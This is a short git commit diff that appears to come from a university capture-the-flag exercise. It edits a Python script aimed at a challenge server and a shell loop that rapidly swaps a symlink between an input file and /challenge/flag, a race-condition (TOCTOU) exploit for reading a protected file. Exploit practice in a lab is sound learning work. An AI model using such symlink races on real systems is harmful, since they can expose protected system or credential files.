This commit is contained in:
2025-11-29 14:08:07 +00:00
parent 063094f2a2
commit ced19da0c6
3 changed files with 3 additions and 4 deletions

View File

@@ -1,5 +1,4 @@
from grequests import Session
from sys import argv
from os import fork
BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25652"

View File

@@ -1,6 +1,6 @@
#!/bin/sh
while [ 1 -eq 1 ]; do
ln -s ./input ./link
ln -s /challenge/flag ./link
ln -fs ./input ./link
ln -fs /challenge/flag ./link
done